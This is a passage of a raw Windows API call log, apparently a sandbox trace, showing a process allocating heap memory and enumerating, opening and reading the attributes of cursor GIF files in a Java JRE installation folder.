dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.100] GetFileType (hFile=0x33c) returned 0x1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0097.100] CloseHandle (hObject=0x33c) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.101] AreFileApisANSI () returned 1 [0097.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b110 [0097.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 71 [0097.101] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99)) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0097.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.101] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="win32_CopyDrop32x32.gif", cAlternateFileName="WIN32_~1.GIF")) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0097.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0097.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.102] AreFileApisANSI () returned 1 [0097.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif", lpUsedDefaultChar=0x0) returned 78 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0097.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.102] AreFileApisANSI () returned 1 [0097.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c6f8 [0097.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x8c6f8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 78 [0097.102] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.104] GetFileType (hFile=0x33c) returned 0x1 [0097.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0097.104] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.104] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.104] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.104] CloseHandle (hObject=0x33c) returned 1 [0097.104] AreFileApisANSI () returned 1 [0097.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c998 [0097.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x8c998, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 78 [0097.105] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.105] GetFileType (hFile=0x33c) returned 0x1 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0097.105] CloseHandle (hObject=0x33c) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.106] AreFileApisANSI () returned 1 [0097.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d178 [0097.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x8d178, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 78 [0097.106] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copydrop32x32.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa5)) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0097.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.106] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="win32_CopyNoDrop32x32.gif", cAlternateFileName="WIN32_~2.GIF")) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0097.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0097.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0097.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.107] AreFileApisANSI () returned 1 [0097.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 80 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0097.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0097.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.108] AreFileApisANSI () returned 1 [0097.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0097.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8d2c8, cchWideChar=80 | out: lpWideCharStr="C:\\Program 